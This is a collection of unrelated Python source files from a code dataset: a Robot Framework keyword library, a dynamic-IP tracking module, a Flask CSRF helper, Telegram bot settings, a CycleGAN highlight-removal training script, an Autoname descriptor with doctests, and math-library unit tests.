sys.stderr.write("Usage:\n {} <config-path> <name-prefix> <tag>\n".format(sys.argv[0]))
sys.exit(1)
main(*sys.argv[1:])
| StarcoderdataPython |
class RecLibrary1(object):
    """Keyword library #1 for exercising keyword-name resolution.

    Each method is a keyword; a few print a marker line identifying which
    library supplied them, the rest are intentionally empty stand-ins.

    COMPAT FIX: the original used Python 2 `print` statements, which are a
    SyntaxError on Python 3.  Single-argument `print(...)` calls produce the
    same output on both Python 2 and 3.
    """

    # --- keywords that identify their origin on stdout ---

    def keyword_only_in_library_1(self):
        print("Keyword from library 1")

    def keyword_in_both_libraries(self):
        print("Keyword from library 1")

    def keyword_in_all_resources_and_libraries(self):
        print("Keyword from library 1")

    def keyword_everywhere(self):
        print("Keyword from library 1")

    def no_operation(self):
        print("Overrides keyword from BuiltIn library")

    # --- empty stand-in keywords ---

    def similar_kw_3(self):
        pass

    def action(self):
        pass

    def do_action(self):
        pass

    def action_and_expect_problems(self):
        pass

    def action_and_ignore_problems(self):
        pass

    def wait_until_action_succeeds(self):
        pass

    def do_stuff(self):
        pass

    def open_application(self):
        pass

    def ask_user_for_input(self):
        pass

    def boot_up_server(self):
        pass

    def shut_down_server(self):
        pass

    def minimize_window(self):
        pass

    def maximize_window(self):
        pass

    def open_window(self):
        pass

    def create_data(self):
        pass

    def delete_data(self):
        pass

    def update_data(self):
        pass

    def modify_data(self):
        pass

    def get_data(self):
        pass

    def read_data(self):
        pass

    def record(self, message, level):
        pass

    def nothing(self):
        pass
| StarcoderdataPython |
1783666 | import json
import requests
from time import sleep, time, ctime
import sys
import subprocess
import socket
def fuzzyLookup(key, word_list):
    """Return the entry of word_list most similar to key.

    Returns '' when word_list is empty or no entry scores above 0.
    Ties keep the earliest candidate.
    """
    from difflib import SequenceMatcher as sm
    best_match = ""
    max_ratio = 0.
    for candidate in word_list:
        score = sm(None, key, candidate).ratio()
        if score > max_ratio:
            max_ratio = score
            best_match = candidate
    return best_match
class IPBank(object):
    """Registry of Device records, loaded from and persisted to a JSON file."""

    def __init__(self):
        self.bank = []          # Device objects parsed so far
        self.file_name = None   # last JSON path used, remembered for reuse

    def _resolve_file_name(self, file_name):
        # Fall back to the remembered path; remember an explicitly given one.
        if file_name is None:
            if self.file_name is None:
                raise DynamipError("A file name should be specified")
            return self.file_name
        self.file_name = file_name
        return file_name

    def savedStates(self, device):
        """Return the stored Device matching *device* (a Device or a name)."""
        if type(device) is not str:
            device = device.getName()
        for known_device in self.bank:
            if known_device.getName() == device:
                return known_device
        raise DynamipError(
            "Could not find information of the following device: %s" % device)

    def parseDict(self, dictionary):
        """Rebuild self.bank from a {name: info} mapping."""
        devices = []
        for device_name, device_info in dictionary.items():
            device = Device(device_name)
            device.fromDict(device_info)
            devices.append(device)
        self.bank = devices

    def parseFile(self, file_name=None):
        """Load the JSON file and return the resulting device list."""
        file_name = self._resolve_file_name(file_name)
        with open(file_name, 'r') as file:
            self.parseDict(json.load(file))
        return self.bank

    def updateFile(self, device, file_name=None):
        """Merge *device*'s record into the JSON file (created if missing)."""
        file_name = self._resolve_file_name(file_name)
        with touchOpen(file_name, 'r+') as file:
            file_info = json.load(file)
            file_info.update(device.toDict())
            # Rewrite in place: rewind, dump, then drop any leftover tail.
            file.seek(0)
            json.dump(file_info, file, sort_keys=True, indent=4)
            file.truncate()

    def __str__(self):
        return "\n-----\n".join(str(device) for device in self.bank)
class NetworkInterface(object):
    """Addressing and tunnelling state for one network interface."""

    def __init__(self):
        # All addressing fields start unknown.
        for attr in ('ip', 'ip_gateway', 'interface_type', 'subnet_mask',
                     'mac_address', 'mac_address_gateway', 'ssh_port'):
            setattr(self, attr, None)
        # interface_type is expected to become 'public', 'wlan', or 'eth'.
        # Tunnel bookkeeping defaults.
        self.tunneled = False
        self.tunnel_request_recieved = False
        self.tunneled_to = {'ip': '0.0.0.0', 'port': 22}

    def fromFile(self, file_name):
        """Populate fields from a config file (stub: only sets ssh_port)."""
        self.ssh_port = 22  # TODO: correct this to read from file
class Device(object):
    """Record of one machine's identity and addressing information.

    Instances are populated either from the running host (fromDevice) or
    from a parsed JSON mapping (fromDict), and serialised back via toDict.
    """

    def __init__(self, name=None):
        self.name = name
        self.networks = []
        self.ip_local = None
        self.ip_public = None
        self.port_forwarding = None
        self.local_network = [{'type': None, 'ip': None}]
        self.update_time = None

    def getName(self):
        """Return the device's name (may be None)."""
        return self.name

    def fromDevice(self):
        """Fill the record by inspecting the machine this code runs on."""
        self.name = getHostname()
        self.ip_public = getIP()
        self.update_time = time()
        # BUG FIX: this used to assign `self.up_loca`, a typo that created a
        # stray attribute and left ip_local permanently None.
        self.ip_local = getLocalIP()
        self.port_forwarding = None  # look this up from config file

    def lookup(self, key, dictionary):
        """Return dictionary[key], or None (with a console notice) if absent."""
        try:
            return dictionary[key]
        except KeyError:
            print(
                'Could not find the key `%s`. Returning `None`.' % key)
            return None

    def fromDict(self, dictionary):
        """Populate ip_public/update_time from a parsed JSON mapping.

        Accepts either this device's info dict directly, or a whole
        {name: info} mapping that contains it.

        Raises:
            DynamipError: if this device has no name to key the lookup on.
        """
        if self.name is None:
            raise DynamipError(
                "Device object needs a name associated with the device")
        if self.name in dictionary.keys():
            print(
                "The dictionary provided to `Device.fromDict` seem to contain information of multiple devices!")
            print("Narrowing the information to current device")
            dictionary = dictionary[self.name]
        self.ip_public = self.lookup('ip_public', dictionary)
        self.update_time = self.lookup('update_time', dictionary)

    def toDict(self):
        """Return a {name: info} mapping suitable for JSON serialisation."""
        information = {}
        information[self.name] = {"ip_public": self.ip_public,
                                  "update_time": self.update_time, "local_network": self.local_network}
        return information

    def isComplete(self):
        """Raise DynamipError unless name, public IP and timestamp are set."""
        # BUG FIX: this checked `self.mtim`, an attribute that is never
        # created anywhere, so the method always crashed with AttributeError;
        # `update_time` is the timestamp field this class actually maintains.
        if None in [self.name, self.ip_public, self.update_time]:
            raise DynamipError(
                "Device information is incomplete:%s" % str(self))

    def __eq__(self, other):
        """Equality on name, public IP and local IP (False on any error)."""
        try:
            equal = True
            equal &= self.name == other.name
            equal &= self.ip_public == other.ip_public
            equal &= self.ip_local == other.ip_local
            return equal
        except Exception as e:
            # BUG FIX: the print arguments were in the wrong order (the
            # exception was printed where the first device name belonged).
            print("Following error happened during comparing %s and %s: %s" %
                  (self.name, other.name, e))
            return False

    def __ne__(self, other):
        """Inverse of __eq__ (True on any comparison error)."""
        # BUG FIX: this was misspelled `__neq__`, which Python never invokes,
        # so `!=` silently fell back to the default behaviour.
        try:
            equal = True
            equal &= self.name == other.name
            equal &= self.ip_public == other.ip_public
            equal &= self.ip_local == other.ip_local
            return not equal
        except Exception as e:
            print("Following error happened during comparing %s and %s: %s" %
                  (self.name, other.name, e))
            return True

    # Backward-compatible alias for any caller that used the misspelled name.
    __neq__ = __ne__

    def __str__(self):
        text = ["Device name: %s" % self.name]
        if self.update_time is not None:
            text.append("- Updated @ %s" % ctime(self.update_time))
        text.append("- Public IP: %s" % self.ip_public)
        text.append("- Local Networks: %s" % self.local_network)
        text = "\n".join(text)
        return text
class DynamipError(Exception):
    """Error raised for device/IP bookkeeping failures in this module."""
def getBashOutput(command):
    """Run *command* (whitespace-split, no shell) and return stripped stdout."""
    proc = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
    stdout, _ = proc.communicate()
    return stdout.decode("utf-8").rstrip()
def getSSID():
    """Return the SSID of the currently associated wireless network."""
    return getBashOutput("iwgetid -r")
def gatewayMacAddress():
    """wip"""
    # NOTE(review): this command relies on shell command substitution
    # `$(...)` and a pipe, but getBashOutput executes via
    # Popen(command.split()) with no shell, so neither will be expanded —
    # as written this cannot work; it needs shell=True or the gateway
    # interface/address resolved in Python first.
    command = "arping -f -I $(ip route show match 0/0 | awk '{print $5, $3}')"
    return getBashOutput(command)
def getLocalIP():
    """Return the local IP address used to reach the internet.

    Connecting a UDP socket selects a source address without sending any
    packets; getsockname() then reveals that address.
    """
    # BUG FIX: the socket was never closed (file-descriptor leak); the
    # context manager guarantees closure.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
def ipFromIpify():
    """Look up this host's public IP via the ipify web service."""
    response = requests.get('https://api.ipify.org/?format=json')
    return json.loads(response.text)['ip']
def ipFromHttpbin():
    """Look up this host's public IP via httpbin.org."""
    response = requests.get('http://httpbin.org/ip')
    return json.loads(response.text)['origin']
def getIP():
    """Return the public IP, trying ipify first and httpbin as a fallback.

    Legacy behaviour preserved: if both services fail, the exception CLASS
    of the last error is returned instead of raising.
    """
    try:
        return ipFromIpify()
    # BUG FIX: was a bare `except:`, which also swallowed SystemExit and
    # KeyboardInterrupt.
    except Exception:
        print(sys.exc_info()[0])
    try:
        return ipFromHttpbin()
    except Exception:
        print(sys.exc_info()[0])
        return sys.exc_info()[0]
def getHostname():
    """Return this machine's network host name."""
    # `socket` is already imported at module level; no local import needed.
    return socket.gethostname()
def touchOpen(file_name, *args, **kwargs):
    """Open *file_name*, creating it first if it does not exist.

    Remaining arguments are forwarded to os.fdopen (e.g. mode 'r+').
    """
    import os
    # O_CREAT makes this succeed even for a brand-new file; the raw
    # descriptor is then wrapped in a regular Python file object.
    descriptor = os.open(file_name, os.O_RDWR | os.O_CREAT)
    return os.fdopen(descriptor, *args, **kwargs)
def writeIPToFile(file_name, hostname):
    """Record this host's current public IP and a timestamp under *hostname*
    in the JSON file *file_name*, creating the file if needed."""
    ip_current_public = getIP()
    # BUG FIX: getLocalIP() used to be called here too, but its result was
    # never written anywhere — the call only opened a socket for nothing,
    # so it has been removed.
    with touchOpen(file_name, 'r+') as file:
        try:
            whole_data = json.load(file)
        except ValueError:
            # Empty or invalid file: start a fresh mapping.
            whole_data = dict()
        info = {'ip_public': ip_current_public, 'update_time': time()}
        # info['local_networks']=getInterfaceList()
        whole_data[hostname] = info
        # Rewrite in place: rewind, dump, then drop any leftover tail.
        file.seek(0)
        json.dump(whole_data, file, sort_keys=True, indent=4)
        file.truncate()
def readIPFromFile(file_name, hostname):
    """Return (public_ip, local_network) stored for *hostname* in *file_name*.

    local_network is None when the entry carries no 'local_networks' key.
    """
    with open(file_name, 'r') as ip_file:
        info = json.load(ip_file)[hostname]
    ip_public = info['ip_public']
    # BUG FIX: `local_network` was returned without ever being assigned (its
    # assignment was commented out), so every call raised NameError.  The
    # commented line read info['local_networks']; .get keeps missing keys safe.
    local_network = info.get('local_networks')
    return ip_public, local_network
def getChangedIP(minutes=15):
    """Poll every *minutes* minutes and return the public IP once it changes."""
    previous_ip = getIP()
    while True:
        sleep(minutes * 60)
        # Any lookup failure propagates to the caller (the original wrapped
        # this call in a `try: ... except: raise`, which added nothing).
        new_ip = getIP()
        if new_ip != previous_ip:
            print('IP changed from', previous_ip, 'to', new_ip)
            return new_ip
if __name__ == '__main__':
    # Ad-hoc smoke test of the fuzzy matcher.
    candidates = ['something', 'nothing', 'somethingelse']
    print(fuzzyLookup('methi', candidates))
| StarcoderdataPython |
3307077 | # -*- coding: utf-8 -*-
import binascii
import os
from flask import abort
from flask import request
from flask import session
def check_csrf_protection():
    """Abort POST requests that lack a valid CSRF token.

    The session token is consumed (popped) on every POST, so each token is
    single-use.  A future per-view opt-out (e.g. a decorator) could disable
    this check for API endpoints.
    """
    if request.method != 'POST':
        return
    expected = session.pop('_csrf_token', None)
    submitted = request.form.get('_csrf_token')
    if not expected or expected != submitted:
        abort(403)
def generate_csrf_token():
    """Return the session's CSRF token, creating one if absent."""
    if '_csrf_token' not in session:
        # BUG FIX: binascii.hexlify() returns a bytes object on Python 3,
        # but check_csrf_protection compares the stored token against
        # request.form values (str), so the comparison could never succeed.
        # Decoding to ASCII stores a text token (and is harmless on Python 2).
        session['_csrf_token'] = binascii.hexlify(os.urandom(16)).decode('ascii')
    return session['_csrf_token']
| StarcoderdataPython |
19025 | <reponame>lamas1901/telegram__pdf-bot
from ..utils import get_env_var
from pathlib import Path
# Project root directory: two levels up from this settings module.
BASE_DIR = Path(__file__).parent.parent
# Secrets are pulled from the environment, never hard-coded.
TG_TOKEN = get_env_var('TG_TOKEN')  # Telegram bot API token
YMONEY_TOKEN = get_env_var('YTOKEN')  # payment token (note: env var is 'YTOKEN')
PROMO_CODE = get_env_var('PROMO_CODE')  # promo code accepted by the bot
| StarcoderdataPython |
1643648 | from __future__ import print_function
import os
import datetime
import argparse
import itertools
from torch.utils.data import DataLoader
from torch.autograd import Variable
import torch
from utils import ReplayBuffer
from utils import LambdaLR
from utils import weights_init_normal
from utils import mask_generator_lab
from utils import QueueMask
from model_l import Generator_F2H, Generator_H2F, Discriminator
from datasets_l import ImageDataset
import sys
import matplotlib.pyplot as plt
import numpy as np
import scipy.io as io
def main(argv=None):
    """Train the highlight-removal CycleGAN (L channel) on the SHIQ dataset.

    Builds both generators and discriminators, their optimizers and LR
    schedulers, runs the adversarial training loop, logs averaged losses
    every opt.iter_loss iterations, and saves checkpoints under model_l/.

    argv is accepted for console-entry compatibility but is unused;
    argparse reads sys.argv directly.
    """
    print(torch.cuda.is_available())
    os.environ["CUDA_VISIBLE_DEVICES"] = "4"
    # Declare the command-line argument parser.
    parser = argparse.ArgumentParser()
    # Register the training hyper-parameters.
    parser.add_argument('--epoch', type=int, default=0, help='starting epoch')
    parser.add_argument('--n_epochs', type=int, default=100, help='number of epochs of training')
    parser.add_argument('--batchSize', type=int, default=1, help='size of the batches')
    parser.add_argument('--lr', type=float, default=0.0002, help='initial learning rate')
    parser.add_argument('--decay_epoch', type=int, default=50,
                        help='epoch to start linearly decaying the learning rate to 0')
    parser.add_argument('--size', type=int, default=400, help='size of the data crop (squared assumed)')
    parser.add_argument('--input_nc', type=int, default=1, help='number of channels of input data')
    parser.add_argument('--output_nc', type=int, default=1, help='number of channels of output data')
    parser.add_argument('--cuda', action='store_false', help='use GPU computation')
    parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
    parser.add_argument('--snapshot_epochs', type=int, default=2, help='number of epochs of training')
    parser.add_argument('--iter_loss', type=int, default=100, help='average loss for n iterations')
    # Parse the command-line arguments.
    opt = parser.parse_args()
    opt.dataroot = 'SHIQ_data'
    if not os.path.exists('model_l'):
        os.mkdir('model_l')
    # os.path.join() combines the directory and file name into a single path.
    opt.log_path = os.path.join('model_l', str('log') + '.txt')
    if torch.cuda.is_available():
        opt.cuda = True

    ###### Definition of variables ######
    # Networks
    netG_A2B = Generator_H2F(opt.input_nc, opt.output_nc)  # highlight to highlight_free
    netG_B2A = Generator_F2H(opt.output_nc, opt.input_nc)  # highlight_free to highlight
    netD_A = Discriminator(opt.input_nc)
    netD_B = Discriminator(opt.output_nc)
    if opt.cuda:
        netG_A2B.cuda()
        netG_B2A.cuda()
        netD_A.cuda()
        netD_B.cuda()
    # apply() recursively visits every sub-module and runs the given weight
    # initialisation function on each of them.
    netG_A2B.apply(weights_init_normal)
    netG_B2A.apply(weights_init_normal)
    netD_A.apply(weights_init_normal)
    netD_B.apply(weights_init_normal)

    # Losses
    criterion_GAN = torch.nn.MSELoss()  # lsgan
    criterion_cycle = torch.nn.L1Loss()
    criterion_identity = torch.nn.L1Loss()

    # Optimizers & LR schedulers
    optimizer_G = torch.optim.Adam(itertools.chain(netG_A2B.parameters(), netG_B2A.parameters()),
                                   lr=opt.lr, betas=(0.5, 0.999))
    optimizer_D_A = torch.optim.Adam(netD_A.parameters(), lr=opt.lr, betas=(0.5, 0.999))
    optimizer_D_B = torch.optim.Adam(netD_B.parameters(), lr=opt.lr, betas=(0.5, 0.999))
    lr_scheduler_G = torch.optim.lr_scheduler.LambdaLR(
        optimizer_G, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
    lr_scheduler_D_A = torch.optim.lr_scheduler.LambdaLR(
        optimizer_D_A, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
    lr_scheduler_D_B = torch.optim.lr_scheduler.LambdaLR(
        optimizer_D_B, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)

    # Inputs & targets memory allocation
    Tensor = torch.cuda.FloatTensor if opt.cuda else torch.Tensor
    input_A = Tensor(opt.batchSize, opt.input_nc, opt.size, opt.size)
    input_B = Tensor(opt.batchSize, opt.output_nc, opt.size, opt.size)
    input_C = Tensor(opt.batchSize, opt.output_nc, opt.size, opt.size)
    target_real = Variable(Tensor(opt.batchSize).fill_(1.0), requires_grad=False)
    target_fake = Variable(Tensor(opt.batchSize).fill_(0.0), requires_grad=False)
    mask_non_highlight = Variable(Tensor(opt.batchSize, 1, opt.size, opt.size).fill_(-1.0),
                                  requires_grad=False)  # -1.0 marks non-highlight

    fake_A_buffer = ReplayBuffer()
    fake_B_buffer = ReplayBuffer()

    # Dataset loader
    dataloader = DataLoader(ImageDataset(opt.dataroot, unaligned=True),
                            batch_size=opt.batchSize, shuffle=True, num_workers=opt.n_cpu)

    curr_iter = 0
    G_losses_temp = 0
    D_A_losses_temp = 0
    D_B_losses_temp = 0
    G_losses = []
    D_A_losses = []
    D_B_losses = []
    # NOTE(review): a float is passed here (len/4); if QueueMask expects an
    # integer capacity this probably wants `// 4` — confirm before changing.
    mask_queue = QueueMask(dataloader.__len__() / 4)
    open(opt.log_path, 'w').write(str(opt) + '\n\n')

    ###### Training ######
    for epoch in range(opt.epoch, opt.n_epochs):
        for i, batch in enumerate(dataloader):
            # Set model input
            real_A = Variable(input_A.copy_(batch['A']))
            real_B = Variable(input_B.copy_(batch['B']))
            mask_real = Variable(input_C.copy_(batch['C']))

            ###### Generators A2B and B2A ######
            optimizer_G.zero_grad()
            # Identity loss
            # G_A2B(B) should equal B if real B is fed
            same_B = netG_A2B(real_B, mask_non_highlight)
            loss_identity_B = criterion_identity(same_B, real_B) * 5.0  # ||Gb(b)-b||1
            # G_B2A(A) should equal A if real A is fed, so the mask should be all zeros
            same_A = netG_B2A(real_A, mask_non_highlight)
            loss_identity_A = criterion_identity(same_A, real_A) * 5.0  # ||Ga(a)-a||1
            # GAN loss
            fake_B = netG_A2B(real_A, mask_real)
            pred_fake = netD_B(fake_B)
            loss_GAN_A2B = criterion_GAN(pred_fake, target_real)  # log(Db(Gb(a)))
            mask = mask_real
            mask_queue.insert(mask)
            mask_random = mask_queue.rand_item()
            fake_A = netG_B2A(real_B, mask_random)
            pred_fake = netD_A(fake_A)
            loss_GAN_B2A = criterion_GAN(pred_fake, target_real)  # log(Da(Ga(b)))
            # Cycle loss
            recovered_A = netG_B2A(fake_B, mask_queue.last_item())  # real highlight, false highlight free
            loss_cycle_ABA = criterion_cycle(recovered_A, real_A) * 10.0  # ||Ga(Gb(a))-a||1
            recovered_B = netG_A2B(fake_A, mask_random)
            loss_cycle_BAB = criterion_cycle(recovered_B, real_B) * 10.0  # ||Gb(Ga(b))-b||1
            # Total loss
            loss_G = loss_identity_A + loss_identity_B + loss_GAN_A2B + loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB
            loss_G.backward()
            G_losses_temp += loss_G.item()
            optimizer_G.step()
            ###################################

            ###### Discriminator A ######
            optimizer_D_A.zero_grad()
            # Real loss
            pred_real = netD_A(real_A)
            loss_D_real = criterion_GAN(pred_real, target_real)  # log(Da(a))
            # Fake loss (drawn from the replay buffer to stabilise training)
            fake_A = fake_A_buffer.push_and_pop(fake_A)
            pred_fake = netD_A(fake_A.detach())
            loss_D_fake = criterion_GAN(pred_fake, target_fake)  # log(1-Da(G(b)))
            # Total loss
            loss_D_A = (loss_D_real + loss_D_fake) * 0.5
            loss_D_A.backward()
            D_A_losses_temp += loss_D_A.item()
            optimizer_D_A.step()
            ###################################

            ###### Discriminator B ######
            optimizer_D_B.zero_grad()
            # Real loss
            pred_real = netD_B(real_B)
            loss_D_real = criterion_GAN(pred_real, target_real)  # log(Db(b))
            # Fake loss
            fake_B = fake_B_buffer.push_and_pop(fake_B)
            pred_fake = netD_B(fake_B.detach())
            loss_D_fake = criterion_GAN(pred_fake, target_fake)  # log(1-Db(G(a)))
            # Total loss
            loss_D_B = (loss_D_real + loss_D_fake) * 0.5
            loss_D_B.backward()
            D_B_losses_temp += loss_D_B.item()
            optimizer_D_B.step()
            ###################################

            curr_iter += 1
            # BUG FIX: the three settings below were referenced as the bare
            # names `iter_loss`, `log_path` and `snapshot_epochs`, which are
            # undefined in this scope (NameError); they live on `opt`.
            if (i + 1) % opt.iter_loss == 0:
                log = 'Epoch: %d, [iter %d], [loss_G %.5f], [loss_G_identity %.5f], [loss_G_GAN %.5f],' \
                      '[loss_G_cycle %.5f], [loss_D %.5f]' % \
                      (epoch, curr_iter, loss_G, (loss_identity_A + loss_identity_B), (loss_GAN_A2B + loss_GAN_B2A),
                       (loss_cycle_ABA + loss_cycle_BAB), (loss_D_A + loss_D_B))
                print(log)
                open(opt.log_path, 'a').write(log + '\n')
                G_losses.append(G_losses_temp / opt.iter_loss)
                D_A_losses.append(D_A_losses_temp / opt.iter_loss)
                D_B_losses.append(D_B_losses_temp / opt.iter_loss)
                G_losses_temp = 0
                D_A_losses_temp = 0
                D_B_losses_temp = 0
                # BUG FIX: this summary block sat one indentation level out,
                # so it ran on every batch and raised IndexError while the
                # loss lists were still empty; it belongs with the averaging.
                avg_log = '[the last %d iters], [loss_G %.5f], [D_A_losses %.5f], [D_B_losses %.5f],' \
                          % (opt.iter_loss, G_losses[-1], D_A_losses[-1], D_B_losses[-1])
                print(avg_log)
                open(opt.log_path, 'a').write(avg_log + '\n')

        # Update learning rates
        lr_scheduler_G.step()
        lr_scheduler_D_A.step()
        lr_scheduler_D_B.step()

        # Save models checkpoints (latest every epoch, numbered snapshots
        # every opt.snapshot_epochs epochs)
        torch.save(netG_A2B.state_dict(), 'model_l/netG_A2B.pth')
        torch.save(netG_B2A.state_dict(), 'model_l/netG_B2A.pth')
        torch.save(netD_A.state_dict(), 'model_l/netD_A.pth')
        torch.save(netD_B.state_dict(), 'model_l/netD_B.pth')
        if (epoch + 1) % opt.snapshot_epochs == 0:
            torch.save(netG_A2B.state_dict(), ('model_l/netG_A2B_%d.pth' % (epoch + 1)))
            torch.save(netG_B2A.state_dict(), ('model_l/netG_B2A_%d.pth' % (epoch + 1)))
            torch.save(netD_A.state_dict(), ('model_l/netD_A_%d.pth' % (epoch + 1)))
            torch.save(netD_B.state_dict(), ('model_l/netD_B_%d.pth' % (epoch + 1)))
        print('Epoch:{}'.format(epoch))
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit status.
    raise SystemExit(main())
| StarcoderdataPython |
4825780 | <filename>mtoolbox/autoname.py
# -*- coding: utf-8 -*-
"""Access an object's name as a property
Autoname is a data-descriptor, which automatically looks up the
name under which the object on which the descriptor is accessed
is known by.
Import the descriptor using ``from mtoolbox.autoname import Autoname``.
Example:
>>> class Object(object):
... name = Autoname()
>>> obj1 = Object()
>>> obj1.name
'obj1'
>>> obj2 = Object()
>>> obj2.name
'obj2'
By default Autoname will return the outer-most name that was defined
for the object:
>>> class Object(object):
... name = Autoname()
>>> def func(anobject):
... return anobject.name
>>> o = Object()
>>> func(o)
'o'
You can change this behaviour by using the 'inner' keyword:
>>> class Object(object):
... name = Autoname(inner=True)
>>> o = Object()
>>> def func(anobject):
... return anobject.name
>>> func(o)
'anobject'
Note:
Please be aware, that getting the inner-most name, is not what you
want in most cases:
>>> class Object(object):
... name = Autoname(inner=True)
... def printname(self):
... print(self.name)
>>> o = Object()
>>> o.printname()
self
When in automatic mode (see the class documentation below) the
descriptor will always return a name, that is in some callframe
dictionary. If you delete a name, it will use another one, that
is still in use:
>>> class Object(object):
... name = Autoname()
>>> o = Object()
>>> o.name
'o'
>>> g = o
>>> del o
>>> g.name
'g'
This can be helped a bit by using the 'bind' keyword argument and
calling <object>.name with the name that should be used first:
>>> class Object(object):
... name = Autoname(bind=True)
>>> o = Object()
>>> o.name
'o'
>>> g = o
>>> del o
>>> g.name
'o'
Warning:
    Defining multiple names for an object in the same call frame (roughly
    speaking, at the same level of indentation in your program) will
    cause undetermined behaviour, depending on the Python interpreter:
>>> class Object(object):
... name = Autoname()
>>> o = Object()
>>> g = o
>>> o.name in ['o', 'g']
True
"""
import doctest
import inspect
class Autoname(object):
    """Create a new Autoname descriptor
    Args:
        initval (str, bool, None): The initial name
        inner (bool): Return the inner-most name of the object (or not)
        bind (bool): Bind the descriptor to the first name it returns
    Returns:
        Autoname: An Autoname instance
    """
    def __init__(self, initval=True, inner=False, bind=False):
        self.val = None
        self.inner = inner
        self.bind = bind
        # Route the initial value through __set__ so it receives the same
        # type validation as any later assignment.
        self.__set__(None, initval)
    def __get__(self, theobject, objtype):
        """Return the name of theobject or None
        Returns:
            str or None: the name of the object
        Usage:
            >>> class Object(object):
            ... name = Autoname()
            >>> obj = Object()
            >>> obj.name
            'obj'
            >>> obj.name = 'another name'
            >>> obj.name
            'another name'
        """
        if isinstance(self.val, str):
            # An explicit name was set (or bound earlier): just return it.
            return self.val
        elif self.val is False or self.val is None:
            # Naming was disabled.
            return None
        else:
            # val is True: automatic lookup through the call stack.
            # If we really didn't find a name, we return None
            thename = None
            # There is at least one frame in the callstack, in which
            # the calling object is a local variable, so we climb up
            # the callstack, to find the name of the object.
            # NOTE: the count == 0 skip below assumes this code runs directly
            # inside __get__; moving it into a helper would change the stack
            # depth and skip the wrong frame.
            for count, frametuple in enumerate(inspect.stack()):
                # skip the first frame - this is our __get__
                if count == 0:
                    continue
                for name, obj in frametuple[0].f_locals.items():
                    # found a name, but keep searching in order to get
                    # the outer-most name unless inner == True
                    if obj is theobject:
                        thename = name
                        if self.inner:
                            self.__bind_if_wanted(thename)
                            return thename
            # Walking outward overwrote thename each time, so the last hit
            # is the outer-most name.
            self.__bind_if_wanted(thename)
            return thename
    def __bind_if_wanted(self, name):
        # With bind=True, freeze the first auto-discovered name so later
        # lookups (and deletions of the original variable) can't change it.
        if self.bind:
            self.__set__(None, name)
    def __set__(self, theobject, val):
        """Set the name of the theobject
        Args:
            theobject (object): The object to which's class
                the descriptor is attached to
            val (str, bool or None): Sets the name to depending on the type:
                str sets the name to this str.
                False or None sets the name to None.
                True sets the name to automatically lookup.
        Returns:
            None
        Raises:
            TypeError if type(val) is invalid
        Usage:
            >>> class Object(object):
            ... name = Autoname()
            >>> o = Object()
            >>> o.name = 'k'
            >>> o.name
            'k'
            >>> o.name = True
            >>> o.name
            'o'
            >>> o.name = False
            >>> str(o.name)
            'None'
            >>> o.name = 4
            Traceback (most recent call last):
            ...
            TypeError: Autoname must be set to str, bool, NoneType
        """
        types = (str, bool, type(None))
        if not isinstance(val, types):
            raise TypeError("Autoname must be set to %s" % ", ".join(
                [t.__name__ for t in types]))
        # NOTE: the value is stored on the descriptor itself (a class
        # attribute), so it is shared by every instance of the owner class.
        self.val = val
if __name__ == '__main__':
    # Run the module's doctest examples when executed directly.
    doctest.testmod()
| StarcoderdataPython |
1693803 | <gh_stars>0
import unittest
import yammpy
# Special float values used as probes throughout the test suite.
NAN = float('nan')    # quiet NaN
INF = float('inf')    # positive infinity
NINF = float('-inf')  # negative infinity
class YammpyTests(unittest.TestCase):
def testConstants(self):
self.assertEqual(yammpy.pi, 3.141592653589793238462643)
self.assertEqual(yammpy.e, 2.718281828459045235360287)
self.assertEqual(yammpy.tau, 2*yammpy.pi)
self.assertEqual(yammpy.phi, 1.61803398874989484820)
self.assertEqual(yammpy.wal, 2.09455148154232659148)
def testAcos(self):
self.assertEqual(yammpy.acos(-1), yammpy.pi)
self.assertEqual(yammpy.acos(0), yammpy.pi/2)
self.assertEqual(yammpy.acos(1), 0)
def testAcosh(self):
self.assertEqual(yammpy.acosh(1), 0)
self.assertEqual(yammpy.acosh(2), 1.3169578969248166)
self.assertEqual(yammpy.acosh(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.acosh(NAN)))
def testAsin(self):
self.assertEqual(yammpy.asin(-1), -yammpy.pi/2)
self.assertEqual(yammpy.asin(0), 0)
self.assertEqual(yammpy.asin(1), yammpy.pi/2)
self.assertTrue(yammpy.isnan(yammpy.asin(NAN)))
def testAsinh(self):
self.assertEqual(yammpy.asinh(0), 0)
self.assertEqual(yammpy.asinh(1), 0.88137358701954305)
self.assertEqual(yammpy.asinh(-1), -0.88137358701954305)
self.assertEqual(yammpy.asinh(INF), INF)
self.assertEqual(yammpy.asinh(NINF), NINF)
self.assertTrue(yammpy.isnan(yammpy.asinh(NAN)))
def testAtan(self):
self.assertEqual(yammpy.atan(-1), -yammpy.pi/4)
self.assertEqual(yammpy.atan(0), 0)
self.assertEqual(yammpy.atan(1), yammpy.pi/4)
self.assertEqual(yammpy.atan(INF), yammpy.pi/2)
self.assertEqual(yammpy.atan(NINF), -yammpy.pi/2)
self.assertTrue(yammpy.isnan(yammpy.atan(NAN)))
def testAtanh(self):
self.assertEqual(yammpy.atanh(0), 0)
self.assertEqual(yammpy.atanh(0.5), 0.54930614433405489)
self.assertEqual(yammpy.atanh(-0.5), -0.54930614433405489)
self.assertTrue(yammpy.isnan(yammpy.atanh(NAN)))
def testCbrt(self):
self.assertEqual(yammpy.cbrt(0), 0)
self.assertEqual(yammpy.cbrt(1), 1)
self.assertEqual(yammpy.cbrt(27), 3)
self.assertEqual(yammpy.cbrt(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.cbrt(NAN)))
self.assertEqual(yammpy.cbrt(15625), 25)
def testCeil(self):
# self.assertEqual(int, type(yammpy.ceil(0.5)))
self.assertEqual(yammpy.ceil(0.5), 1)
self.assertEqual(yammpy.ceil(1.0), 1)
self.assertEqual(yammpy.ceil(1.5), 2)
self.assertEqual(yammpy.ceil(-0.5), 0)
self.assertEqual(yammpy.ceil(-1.0), -1)
self.assertEqual(yammpy.ceil(-1.5), -1)
